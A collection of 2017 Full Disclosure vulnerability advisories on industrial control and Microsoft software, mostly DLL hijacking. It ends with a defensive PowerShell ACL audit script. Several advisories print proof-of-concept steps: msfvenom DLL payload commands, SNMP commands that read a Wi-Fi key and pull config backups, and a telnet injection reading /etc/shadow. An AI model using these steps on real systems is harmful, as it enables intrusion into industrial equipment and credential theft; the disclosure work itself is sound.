(AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:H).


Missing Libraries

i2capi.dll



Application Executables (that look for missing DLL)

Runtime.exe



Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o i2capi.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\Pro-face\WinGP\

3. Run Runtime.exe -> calc.exe executes


Best Regards,
Karn Ganeshen


[FD] Schneider Electric Pro-Face WinGP – Runtime.exe – Insecure Library Loading Allows Code Execution

2017-06-30 Thread Karn Ganeshen
[ICS] Schneider Electric Pro-Face WinGP – Runtime.exe – Insecure Library
Loading Allows Code Execution

Vendor: Schneider Electric
Equipment: Pro-Face WinGP
Vulnerability: Uncontrolled Search Path Element (DLL side-loading)

Advisory URL:
https://ipositivesecurity.com/2017/06/28/ics-schneider-electric-pro-face-wingp-insecure-library-loading-allows-code-execution/



AFFECTED PRODUCTS



Schneider Electric Pro-Face WinGP - Packaged version with GP Pro Server EX
-> current version



ABOUT




WinGP is a runtime engine, and is a component of Schneider Electric
Pro-Face GP Pro-Server EX. Pro-Face GP Pro-Server EX is premier HMI
Development Software that supports Dedicated and Open HMI (PC-based)
solutions.

https://www.proface.com/en/download/trial/gpproex/v40
http://www.pro-face.com/otasuke/download/trial/



VULNERABLE VERSION



Packaged version with GP Pro Server EX -> current version



IMPACT




Successful exploitation of this vulnerability could allow an authenticated
user to escalate his or her privileges.



VULNERABILITY DETAILS




This vulnerability allows attackers to execute arbitrary code on vulnerable
installations of Schneider Electric Pro-Face WinGP software. User
interaction is required to exploit this vulnerability in that the malicious
dll file should be saved in any of the DLL search paths.

The specific flaw exists within the handling of a specific named DLL file
used by Runtime.exe. By default, the program is installed in C:\Pro-Face\
and any authenticated local users have RWX access. By placing a specific
DLL/OCX file (listed below), an attacker is able to force the process to
load an arbitrary DLL. This allows an attacker to execute arbitrary code in
the context of the process when it is run.



DLL File Names



i2capi.dll



Application Executables (that look for missing DLL/OCX)



Runtime.exe



Steps to reproduce




1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o i2capi.dll
2. Place this dll in install directory (or C:\Windows, or any directory
defined in the PATH environment variable)
C:\Pro-face\WinGP\
3. Run Runtime.exe -> calc.exe executes



[FD] Schneider Electric Interactive Graphical SCADA System Software – Insecure Library Loading Allows Code Execution

2017-06-29 Thread Karn Ganeshen
Vendor: Schneider Electric
Equipment: Interactive Graphical SCADA System (IGSS) Software
Vulnerability: DLL Hijacking
Advisory URL:
https://ipositivesecurity.com/2017/05/18/ics-schneider-electric-interactive-graphical-scada-system-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-094-01


AFFECTED PRODUCTS

Schneider Electric reports that the vulnerability affects the following
IGSS HMI desktop application:
IGSS Software, Version 12 and previous versions.


IMPACT

An attacker who exploits this vulnerability may be able to remotely execute
arbitrary code.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
The software will execute a malicious file if it is named the same as a
legitimate file and placed in a location that is earlier in the search path.

CVE-2017-6033 has been assigned to this vulnerability. A CVSS v3 base score
of 6.8 has been calculated; the CVSS vector string is
(AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).


Vulnerable Libraries:

msjet48.dll
msjet47.dll
msjet46.dll
msjet45.dll
msjet44.dll
msjet43.dll
msjet42.dll
msjet41.dll
hhctrl.ocx


Application Executables (that look for missing DLL):

igss.exe
igss_dde.exe
IGSSdataServer.exe
genhdm.exe
mre.exe
RsLinxTo7TABSLC.exe
WinBROWSE.exe


Application Executables (that look for missing OCX):

errcode.exe
def.exe
chelm.exe


Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o msjet41.dll
2. Place this dll (or any of above listed dlls) in install directory (or
C:\Windows, or any directory defined in the PATH environment variable)
C:\app-folder-RW\
3. Run igss.exe -> calc.exe will execute



[FD] BLF-Tech LLC VisualView HMI Software – Insecure Library Loading Allows Code Execution

2017-06-29 Thread Karn Ganeshen
Vendor: BLF-Tech LLC
Equipment: VisualView HMI Software
Vulnerability: DLL Hijacking
Advisory URL:
https://ipositivesecurity.com/2017/05/18/ics-blf-tech-llc-visualview-hmi-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-115-01


AFFECTED PRODUCTS

The following VisualView HMI versions are affected:

VisualView HMI Version 9.9.14.0 and prior.


IMPACT

An attacker who exploits this vulnerability may be able to remotely execute
arbitrary code.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may allow an attacker to run a malicious DLL file within the search
path, resulting in execution of arbitrary code.

CVE-2017-6051 has been assigned to this vulnerability. A CVSS v3 base score
of 7.0 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).


Missing Libraries:

iopc2.dll


Application Executables (that look for missing DLL):

Configure.exe


Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o iopc2.dll
2. Place this dll in the install directory (or C:\Windows, or any directory
defined in the PATH environment variable), e.g.
C:\app-folder-RW\
3. Open VisualView from the Desktop shortcut icon, or execute Configure.exe
from the install directory -> calc.exe will execute

+

___

[FD] Schneider Electric Wonderware InduSoft Web Studio Privilege Escalation

2017-06-29 Thread Karn Ganeshen
Vendor: Schneider Electric
Equipment: Wonderware InduSoft Web Studio
Vulnerability: Incorrect Default Permissions
Advisory URL:
https://ipositivesecurity.com/2017/05/19/ics-schneider-electric-wonderware-indusoft-web-studio-privilege-escalation/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-138-02


AFFECTED PRODUCTS

The following versions of Schneider Electric’s Wonderware InduSoft Web
Studio are affected:

Wonderware InduSoft Web Studio v8.0 Patch 3 and prior versions.


IMPACT

Successful exploitation of this vulnerability could allow an authenticated
user to escalate his or her privileges.


VULNERABILITY OVERVIEW


INCORRECT DEFAULT PERMISSIONS CWE-276
Upon installation, Wonderware InduSoft Web Studio creates a new directory
and two files, which are placed in the system’s path and can be manipulated
by non-administrators. This could allow an authenticated user to escalate
his or her privileges.

The directory and files are added to the system’s PATH. Therefore, the
following can be manipulated by non-administrator users:

• File C:\Bin\x86\aahClientManaged.dll has weak permissions: ALLOW NT
AUTHORITY\Authenticated Users: FILE_WRITE_DATA FILE_APPEND_DATA DELETE
• File C:\Bin\x86\ has weak permissions: ALLOW NT AUTHORITY\Authenticated
Users: FILE_ADD_FILE FILE_ADD_SUBDIRECTORY FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES DELETE

CVE-2017-7968 has been assigned to this vulnerability. A CVSS v3 base score
of 7.3 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).

+

___

[FD] Trihedral VTScada Multiple Vulnerabilities

2017-06-29 Thread Karn Ganeshen
Vendor: Trihedral
Equipment: VTScada
Vulnerability: Resource Consumption, Cross-Site Scripting, Information
Exposure
Advisory URL:
https://ipositivesecurity.com/2017/06/15/ics-trihedral-vtscada-multiple-vulnerabilities/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-164-01


AFFECTED PRODUCTS

The following versions of VTScada, an HMI SCADA software, are affected:

VTScada Versions prior to 11.2.26


IMPACT


Successful exploitation of these vulnerabilities could result in
uncontrolled resource consumption, arbitrary code execution, or information
exposure.


VULNERABILITY OVERVIEW


UNCONTROLLED RESOURCE CONSUMPTION CWE-400


The client does not properly validate the input or limit the amount of
resources that are utilized by an attacker, which can be used to consume
more resources than are available.

CVE-2017-6043 has been assigned to this vulnerability. A CVSS v3 base score
of 7.5 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Exploitation

Note that this vulnerability targets the VTScada thick client installed on
the system. Any application user (including a non-admin, restricted user)
who has access to the thick client can potentially bring down the system.

The payload can be up to ~80k characters. Repeated attempts result in spiked
CPU usage and consumption of RAM / paging resources. Where a full-blown
application (or multiple applications, in a production scenario) is deployed,
i.e. with an operational/functional configuration, memory/CPU usage is
notably higher than that of a blank test application. Repeatedly
submitting such a large username input rapidly consumes available server
memory, leading to resource exhaustion. This eventually forces a system
reboot.

Where an endpoint security solution (such as AV/HIPS/Anti-Malware) is
deployed on the system, resource exhaustion may be achieved considerably
faster.

CROSS-SITE SCRIPTING CWE-79

A cross-site scripting vulnerability may allow JavaScript code supplied by
the attacker to execute within the user’s browser.

CVE-2017-6053 has been assigned to this vulnerability. A CVSS v3 base score
of 6.5 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N).

Exploitation

Multiple URLs and parameters were found to be vulnerable to reflected
Cross-Site Scripting.

INFORMATION EXPOSURE CWE-548


Some files are exposed within the web server application to unauthenticated
users. These files may contain sensitive configuration information.

CVE-2017-6045 has been assigned to this vulnerability. A CVSS v3 base score
of 7.5 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

+

___

[FD] Digital Canal Structural Wind Analysis Stack Buffer Overflow

2017-06-29 Thread Karn Ganeshen
Vendor: Digital Canal Structural
Equipment: Wind Analysis
Vulnerability: Stack-Based Buffer Overflow
Advisory URL:
https://ipositivesecurity.com/2017/06/15/ics-digital-canal-structural-wind-analysis-stack-buffer-overflow/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-157-02


AFFECTED PRODUCTS


The following versions of Wind Analysis, a structural engineering software
platform, are affected:

Wind Analysis versions 9.1 and prior.


IMPACT


Successful exploitation of this vulnerability could cause the device that
the attacker is accessing to become unavailable, resulting in a denial of
service.


VULNERABILITY OVERVIEW


STACK-BASED BUFFER OVERFLOW CWE-121


An attacker may be able to run arbitrary code by remotely exploiting an
executable to perform a denial-of-service attack.

CVE-2017-7910 has been assigned to this vulnerability. A CVSS v3 base score
of 7.5 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).


Exploitation

Note: This is a local exploit, not remote.

Vulnerable application
reconfig.exe

Exploit -> EIP overwrite
C:\dcc\wind9> reconfig.exe 

Payload
"A"*576 + "B"*4 + "C"*420

+

___

[FD] Microsoft Machine Debug Manager (mdm) DLL side loading vulnerability

2017-06-29 Thread Karn Ganeshen
Microsoft Machine Debug Manager (mdm) DLL side loading vulnerability
Vulnerability: DLL Hijacking / DLL Side Loading

Advisory URL:
https://ipositivesecurity.com/2017/06/15/microsoft-machine-debug-manager-mdm-insecure-library-loading-allows-code-execution/


ABOUT


The Machine Debug Manager, mdm.exe, is a program that provides support for
program debugging.

Machine Debug Manager (mdm.exe) is known to be either installed standalone,
or is part of / packaged with the following:


Products


Riven (Red Orb)
Windows 2000 Professional Debug/Checked Build (Microsoft)
SDKs and Tools (Microsoft)
Visual C++ (Microsoft)
BackOffice Server 2000 (Microsoft)
Visual Studio 6.0 (Microsoft)
MSDN Disc 2466 (Microsoft)
MSDN Disc 1550 (Microsoft)
Windows (Microsoft)
Servers (Microsoft)
Windows 2000 (Microsoft)
Windows 2000 Professional (Microsoft)
SQL Server (Microsoft)
Windows 2000 Professional - Dell Reinstallation CD (Microsoft)
Visual Studio (Microsoft)
Office (Microsoft)
Windows 2000 - Dell Reinstallation CD (Microsoft)
Platforms, Servers, Applications (Microsoft)
Platforms (Microsoft)
Applications, Platforms, Servers (Microsoft)

Note: the list above is not exhaustive.


DETAILS


During testing, it was found that MDM is affected by a DLL hijacking
vulnerability. The following conditions are required to exploit the MDM DLL
hijacking vulnerability:

1. MDM (mdm.exe) is installed
2. The "Disable script debugging (Other)" option is not selected (IE -> Internet
Options -> Advanced)

Tested on Windows 7 SP1: when MDM is installed and enabled on the system,
it was seen to be triggered via multiple Windows applications, as well as
via Windows administrative service console(s) (*.msc).

When mdm.exe is triggered, it looks for a specific DLL file - msdbgen.dll -
in the directories defined in the PATH env variable. If an attacker and / or a
malicious user can place a specially crafted DLL file in any of these
directories, then it is possible to execute arbitrary code with the
privileges of the target user. This can potentially result in the attacker
achieving complete control of the affected system.

Exploitation could be performed via multiple Windows applications. A few
scenarios are listed:


Exploitation environment:


a. Windows 7 SP1
b. Folder - C:\app-folder-RW\ - configured in the system PATH env variable
c. Generate a calc.exe payload as a dll file
msfvenom -p windows/exec cmd=calc.exe -f dll -o msdbgen.dll
d. This dll is placed in C:\app-folder-RW\



Test Scenario 1 - Microsoft Windows built-in Administrative Service
Consoles


This behavior can be exploited even if the target user (administrator /
privileged user) does not run any software.

When the target user (administrator) opens certain Windows built-in
administrative tools, mdm.exe is triggered. Some of the *.msc consoles that
resulted in loading our malicious dll and successfully executing code are:

Services - services.msc
Performance Management - perfmon.msc
Printer Management - printmanagement.msc
Group Policy Editor - gpedit.msc
Resultant Set of Policies - rsop.msc
Component Services - comexp.msc -> triggers services.msc

-> calc opens

In most cases, once the administrator opens up any of the above listed
Windows management service consoles, our code is executed, and then the
service consoles open up with a slight delay. No crashes, easy privilege
escalation and continued persistence without raising flags, eh.


Test Scenario 2 - MS Office 2013 SP1 (MS Access)


a)
Open MS Access 2013
Menu -> External Data Menu
Select any option - Import Text File / Import XML File etc
-> calc opens

b)
Open MS Access 2013
Create a Table
Export to PDF or Export to Table
-> calc opens


Test Scenario 3 - MS Office 2013 SP1 (Excel/Access/Word/others)


Open any of the MS Office applications
Menu -> Accounts -> About  -> Tech Support
-> calc opens


Test Scenario 4.1 - MS HTML Help files (chm)


Open any chm file
-> calc opens


Test Scenario 4.2 - Product Help Manual Windows (chm)


Open any Windows software
Open its Help / Support / Manual / Documentation option
-> calc opens



+

___

[FD] Microsoft Office Patch Installer Executables - Insecure Library Loading Allows Code Execution

2017-06-29 Thread Karn Ganeshen
Microsoft Office Patch Installer Executables - Insecure Library Loading
Allows Code Execution
Vulnerability: DLL Hijacking / DLL Side Loading

Advisory URL:
https://ipositivesecurity.com/2017/06/15/microsoft-office-patch-installers-insecure-library-loading-allow-code-execution/


ABOUT


Microsoft Office patch installer executables are found to be vulnerable to
a DLL side loading / hijacking issue.

This issue was observed when installing a patch for Microsoft Excel 2013
SP1. Patch installer for Microsoft Word was also tested and confirmed to
exhibit the same behavior. Other patch installers may also be vulnerable.

When the patch installer is run, specific DLL file(s) are looked for in the
current directory, that is, the directory from which the patch installer
is run. If an attacker and / or a malicious user can place crafted DLL
file(s) in the current directory from which the patch installer is run,
then it is possible to execute arbitrary code with the privileges of that
user (the administrator installing Microsoft Excel / Word / other Office
applications).

This is also applicable where the installer is run from a shared folder on
another system
(\\server\shared_folder\mso2013-kb3127968-fullfile-x86-glb.exe).

Note 1: these dlls are loaded by - mso2013-kb3127968-fullfile-x86-glb.exe -
before Microsoft Executable Installer - msiexec.exe - starts.

Note 2: In the case of a Microsoft Word patch update installation, in addition
to the installer exe (word2013-kb3128004-fullfile-x86-glb.exe) looking for
DLLs in the current directory, once msiexec.exe runs as part of the
installation process, it looks for and loads several DLLs (for example,
netmsg.dll) from directories in the PATH env variable, leading to code
execution if we can place our malicious dll there.


Tested versions

Verified on Windows 7 32-bit SP1 + MS Office 2013 SP1

+

___


[FD] Carlo Gavazzi VMUC-EM - Multiple Vulnerabilities

2017-04-07 Thread Karn Ganeshen
*VMU-C Web-Server solution for photovoltaic applications*

VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is
a hardware data aggregator for medium to larger projects and Em2 Server is
a software solution for large projects. They are designed to complement the
extensive line of Carlo Gavazzi energy meters and current transformers.

*ICS-CERT advisory*
https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03

*CVE-IDs*
CVE-2017-5144
CVE-2017-5145
CVE-2017-5146

*Vulnerable versions*

   - VMU-C EM prior to firmware Version A11_U05, and
   - VMU-C PV prior to firmware Version A17


*1. Weak Credentials Management*
-> admin/admin
-> Application does not enforce mandatory password change

*2. Sensitive Information stored in clear-text*
Accounts menu option
⇒ shows username and password
⇒ passwords shown in clear-text
⇒ SMTP server password
⇒ user and service passwords are stored in clear-text

*3. Access Control flaws*

   1. Access control is not enforced correctly
   2. Certain application functions can be accessed without any
   authentication
   3. Application stores the Energy / Plant data in a sqlite database -
   EWPlant.db. Anyone can dump plant database file - without any authentication

*4. Reflected + Stored XSS - multiple URLs, parameters - *Not documented in
ICS-CERT Advisory

Successful exploitation of this vulnerability could allow an
unauthenticated attacker to inject arbitrary JavaScript in a specially
crafted URL request where the response containing user data is returned to
the web browser without being made safe to display.

*5. Vulnerable to Cross-Site Request Forgery*

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as configuration
parameter changes, and saving modified configuration.

+

___

[FD] Cambium SNMP Security Vulnerabilities

2017-04-07 Thread Karn Ganeshen
Cambium SNMP Security Vulnerabilities

AFFECTED PRODUCTS

Cambium ePMP 1000
Cambium ePMP 2000
Cambium PMP XXX
Cambium ForceXXX models
Potentially all other models

IMPACT

These vulnerabilities may allow an attacker to access device configuration
as well as make unauthorized changes to the device configuration.

Disclosure Timelines

First reported to ICS-CERT - Sep 12, 2017
Latest vendor response - Apr 5, 2017
Fix planned for Q2 2017
Public Disclosure - Apr 6, 2017


BACKGROUND

Through its extensive portfolio of reliable, scalable and secure wireless
narrowband and wireless broadband networks, Cambium Networks makes it
possible for all service providers; industrial, enterprise, government, and
service providers to build affordable, reliable, high-performance
connectivity. Our wireless networks enable industrial Internet of things
(IIoT) connectivity, and for service providers to improve customer
satisfaction and efficiency.

SNMP Feature

SNMP is a standard protocol employed by many types of Internet protocol
based products and allows centralized and remote device management
capabilities. One of the many standard SNMP capabilities enables users to
manage the product, including accessing device configuration, making
changes, as well as triggering back up and restore.

Specific to Cambium devices:

* It is possible to access full device configuration using SNMP. Device
configuration includes usernames, passwords, SSIDs, keys, certificates,
syslog config, and other network & wifi specific details.
* It is possible to trigger configuration backups, which can then be
retrieved using SNMP.
* It is possible to wipe out and / or make changes to the device
configuration remotely.

VULNERABILITY OVERVIEW

A. SNMP COMMUNITY STRINGS PRIVILEGES ARE NOT ENFORCED CORRECTLY

It is possible to use SNMP ReadOnly community string to access MIBs that
should only be accessible using ReadWrite community string (for example
Wireless key). Different versions leak different pieces of RW-only
accessible information. Current version (at the time of reporting 3.2)
allowed RO string to read WPA2 key.

For example:

snmpget -v2c -c public  1.3.6.1.4.1.17713.21.3.8.2.4.0


B. DEVICE CONFIGURATION BACKUPS – ACCESS CONTROL ISSUES

Using SNMP, device configuration backups can be remotely triggered. Using
specific MIBs, we can:
1. trigger the backup, and
2. identify exact backup file name, & location.

In case any backup file(s) are already present, their names & locations can
also be retrieved.

Trigger backup
snmpset -v2c -c private  1.3.6.1.4.1.17713.21.6.4.10.0 i 1
iso.3.6.1.4.1.17713.21.6.4.10.0 = INTEGER: 1

Get backup file location & name
snmpget -v2c -c public  1.3.6.1.4.1.17713.21.6.4.13.0
iso.3.6.1.4.1.17713.21.6.4.13.0 = STRING: "http://IP/dl/3.2.2_00.json"

All the backup files are uploaded on the web server root directory /, and
lack any access control. Anyone can enumerate & dump the backup
configuration file(s) directly. Using the information in device
configuration, it may be possible to gain access to the device, and / or
its clients (wireless devices and users).

+
Metasploit module will be released shortly.
+

___

[FD] SenNet Data Logger appliances and Electricity Meters Multiple Vulnerabilities

2017-04-07 Thread Karn Ganeshen
SenNet Data Logger appliances and Electricity Meters Multiple
Vulnerabilities

Note: Vendor has released the fix. Details to be documented in ICS-CERT
Advisory.

About
SenNet is a trademark of Satel Spain that offers monitoring and
remote-control solutions for businesses. Our engineers develop, integrate
and test the products of SenNet in our facilities in Madrid (Spain).

http://www.sennetmonitoring.com/wp-content/uploads/2016/05/Datasheet_owa31I-.pdf

Vulnerable products

SenNet Optimal DataLogger appliance
SenNet Solar DataLogger appliance
SenNet Multitask Meter

Deployment Geography
Americas and Europe regions

Target Audience / Industry
Energy, Power, Service Providers, Telecom

Note: all appliances seem to be running on the same code base, and
therefore, all SenNet models, and software versions stand vulnerable.

Appliances Confirmed affected:

SenNet Solar
Datalogger Model: OWA3X
Serial Number: A04WCJ
Licence type: A02
Version: V5.03-1.56a

SenNet Optimal
Datalogger Model: OWA31
Serial Number: A05B89
License type: A02
Version: V5.37c-1.43c

SenNet Multitask Meter
Datalogger Model: OWA3X
Serial Number: A04ZZ3
Licence type: A02
Version: V5.21a-1.18b

SenNet Optimal is a monitoring solution to meter consumption (electricity,
gas, water) and other variables (temperature, humidity, presence, lighting
…); both for industries and for businesses in the tertiary sector.

http://www.sennetmonitoring.com/en/sennet-optimal-2/

SenNet Solar is a solution for monitoring. It is suitable for any kind of
power generation plants. In this type of facilities, it is essential to
monitor and remotely control the devices involved in the process:
inverters, meters, trackers, etc.

http://www.sennetmonitoring.com/en/sennet-solar/

SenNet Meter is an ideal device for electricity submetering.
http://www.sennetmonitoring.com/en/electricity-meters/

Vulnerability Details

1. No access control on the remote shell
The appliance runs ARM as the underlying OS. Telnet access is enabled on TCP
port 5000. No authentication is required for accessing and connecting to
the remote shell. Any user can connect to the shell and issue commands.

2. Shell services running with excessive privileges (superuser)
The service runs with superuser (root) privileges, thus giving privileged
access to any user, without any authentication (exploited via the OS Command
Injection described next).

3. OS Command Injection
The remote shell offers (or attempts to offer) a restricted environment and
does not allow executing system commands. However, it is possible to break
out of this jailed shell by chaining specific shell meta-characters and OS
commands.

The service / application is run as 'root' and OS command injection results
in full system access.

Apart from energy logging data, the device stores sensitive information
such as FTP, SMTP and other service login credentials, used by the
application for its functions as well as to connect to other external,
public-facing servers.

PoC:

# telnet IP 5000 2>/dev/null
Trying IP...
Connected to IP.
Escape character is '^]'.
$ true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf;
/bin/sh: $: not found
uid=0(root) gid=0(root)
/home
root:$1$:13852:0:9:7:::
nobody:*:13852:0:9:7:::
nfsnobody:!!:13852:0:9:7:::
  PID USER       VSZ STAT COMMAND
    1 root      2412 S    init
    2 root         0 SW   [kthreadd]
    3 root         0 SW   [ksoftirqd/0]

root=postmaster
mailhub=:25
rewriteDomain=example.com
hostname=_HOSTNAME_


4. Insecure Transport - all communications are clear-text, and prone to
sniffing.

+
Metasploit module will be released shortly.
+

___

[FD] Sielco Sistemi Winlog SCADA Software Insecure Library Loading Allows Code Execution

2017-04-07 Thread Karn Ganeshen
Sielco Sistemi Winlog SCADA Software Insecure Library Loading Allows Code
Execution

Vendor: Sielco Sistemi
Equipment: Winlog SCADA Software
Vulnerability: Uncontrolled Search Path Element

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-038-01

AFFECTED PRODUCTS

The following Sielco Sistemi products are affected:

Winlog Lite SCADA Software, versions prior to Version 3.02.01, and
Winlog Pro SCADA Software, versions prior to Version 3.02.01

Vulnerable Libraries:
[+] applicom.dll
[+] w95_s7m.dll

Application Executables (that look for missing DLL):
PManager.exe
Runtime.exe

Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o applicom.dll

2. Place this dll in the install directory (or C:\Windows, or any directory
defined in the PATH environment variable), e.g.
C:\evil-rw-folder\

3. Run PManager.exe (or Runtime.exe) -> calc.exe will execute


IMPACT

Successful exploitation of this vulnerability may allow an attacker to load
a malicious DLL and execute code on the affected system with the same
privileges as the application that loaded the malicious DLL.

VULNERABILITY OVERVIEW
UNCONTROLLED SEARCH PATH ELEMENT (CWE-427)

An uncontrolled search path element (DLL Hijacking) vulnerability has been
identified. Exploitation of this vulnerability could give an attacker
access to the system with the same level of privilege as the application
that utilizes the malicious DLL.

CVE-2017-5161 has been assigned to this vulnerability. A CVSS v3 base score
of 7.2 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H).

+

___

[FD] LAquis SCADA Access Control Vulnerability

2017-04-07 Thread Karn Ganeshen
LCDS – Leão Consultoria e Desenvolvimento de Sistemas LTDA ME LAquis SCADA
Access Control Vulnerability

Vendor: LCDS – Leão Consultoria e Desenvolvimento de Sistemas LTDA ME
Equipment: LAquis SCADA
Vulnerability: Improper Access Control

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-075-01

AFFECTED PRODUCTS

The following versions of LAquis SCADA, industrial automation software,
are affected:
LAquis SCADA software, Versions 4.1 and prior versions released before
January 20, 2017.

IMPACT
Successful exploitation of this vulnerability could allow authenticated
system users to escalate their privileges and modify or replace application
files.

IMPROPER ACCESS CONTROL CWE-284
An Improper Access Control vulnerability has been identified, which may
allow an authenticated user to modify application files to escalate
privileges.

CVE-2017-6016 has been assigned to this vulnerability. A CVSS v3 base score
of 7.3 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).

VULNERABILITY OVERVIEW

SCADA LAquis software is vulnerable to local privilege escalation. EVERYONE
has FULL permissions over all the install files (*exe,*dll), therefore, it
is possible for any local, authenticated, non-admin user to replace/modify
original application files with malicious ones, and gain higher privileged
access once an administrative user runs the application. Other vectors are
possible as well.

+

___
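Two of the findings on this page reduce to the same access-control check: a directory on the machine PATH that non-administrators can write to (the InduSoft C:\Bin\x86 finding, and the C:\app-folder-RW\ precondition the DLL-hijacking advisories rely on), and install files that Everyone has full control over (the LAquis finding). The PowerShell script below is an added example, not code from the advisories or from any vendor; it reads ACLs with Get-Acl, and the install directory it is pointed at is a placeholder.

```powershell
# Added example (not from the advisories): audit for the two weak-ACL conditions
# reported on this page.
#   1. A directory on the machine PATH that low-privileged users can write to
#      (InduSoft: C:\Bin\x86 writable by Authenticated Users; the DLL-hijacking
#      advisories assume such a directory, e.g. C:\app-folder-RW\).
#   2. Executables/libraries in an install directory that Everyone can modify
#      (LAquis: FULL permissions for EVERYONE over *.exe and *.dll).
# Run from an elevated PowerShell prompt so that every ACL can be read.

# Principals that should never hold write rights on a PATH or install directory.
# These are the English well-known names; on a localized Windows compare SIDs instead.
$LowPrivPrincipals = @(
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'BUILTIN\Users'
)

# Specific rights that let a user plant or replace a binary. FILE_WRITE_DATA and
# FILE_ADD_FILE share one bit (WriteData/CreateFiles); FILE_APPEND_DATA and
# FILE_ADD_SUBDIRECTORY share another (AppendData/CreateDirectories).
$WriteRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::AppendData -bor
               [System.Security.AccessControl.FileSystemRights]::Delete -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership

# Generic rights show up in some inherited ACEs; both of these imply write access.
$GenericWrite = 0x40000000   # GENERIC_WRITE
$GenericAll   = 0x10000000   # GENERIC_ALL

function Get-WeakAclEntry {
    # Emits one object per Allow ACE that grants write rights to a low-privileged principal.
    param([Parameter(Mandatory)][string]$Path)

    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop }
    catch { Write-Warning "Cannot read ACL of ${Path}: $_"; return }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $identity = $ace.IdentityReference.Value
        if ($LowPrivPrincipals -notcontains $identity) { continue }

        # Cast to int: ACEs carrying generic rights do not map to named enum members.
        $rights = [int]$ace.FileSystemRights
        $grantsWrite = (($rights -band [int]$WriteRights) -ne 0) -or
                       (($rights -band $GenericWrite) -ne 0) -or
                       (($rights -band $GenericAll) -ne 0)
        if (-not $grantsWrite) { continue }

        [pscustomobject]@{
            Path        = $Path
            Identity    = $identity
            Rights      = $ace.FileSystemRights
            Inherited   = $ace.IsInherited
            # An InheritOnly ACE does not apply to the object itself, only to children
            # created under it; for a directory that still covers newly planted DLLs.
            InheritOnly = (($ace.PropagationFlags -band
                [System.Security.AccessControl.PropagationFlags]::InheritOnly) -ne 0)
        }
    }
}

function Get-PathDirectoryAudit {
    # Audits every entry of the machine PATH: this is the PATH inherited by services
    # and by elevated processes, so it is the one that matters for search-path hijacking.
    $machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine')
    $entries = $machinePath -split ';' | Where-Object { $_.Trim() -ne '' } | Select-Object -Unique
    foreach ($entry in $entries) {
        $dir = [Environment]::ExpandEnvironmentVariables($entry.Trim().Trim('"'))
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
            # A PATH entry that does not exist is also a finding: whoever can create
            # the directory controls everything later loaded from it.
            [pscustomobject]@{ Path = $dir; Identity = '(directory missing)'; Rights = $null;
                               Inherited = $false; InheritOnly = $false }
            continue
        }
        Get-WeakAclEntry -Path $dir
    }
}

function Get-InstallDirectoryAudit {
    # Audits the install directory itself plus every .exe, .dll and .ocx under it.
    param([Parameter(Mandatory)][string]$InstallDir)
    Get-WeakAclEntry -Path $InstallDir
    Get-ChildItem -LiteralPath $InstallDir -Recurse -File -Include *.exe, *.dll, *.ocx -ErrorAction SilentlyContinue |
        ForEach-Object { Get-WeakAclEntry -Path $_.FullName }
}

# Example run. The install directory is a placeholder for the product being audited.
# Remediation for a hit is to drop the entry from the machine PATH, or to remove the
# write ACE once the application is confirmed not to need it, e.g.
#   icacls <dir> /remove:g "Authenticated Users" /T
$InstallDir = 'C:\Program Files\ExampleVendor\ExampleProduct'   # placeholder
Get-PathDirectoryAudit | Format-Table -AutoSize
if (Test-Path -LiteralPath $InstallDir -PathType Container) {
    Get-InstallDirectoryAudit -InstallDir $InstallDir | Format-Table -AutoSize
}
```

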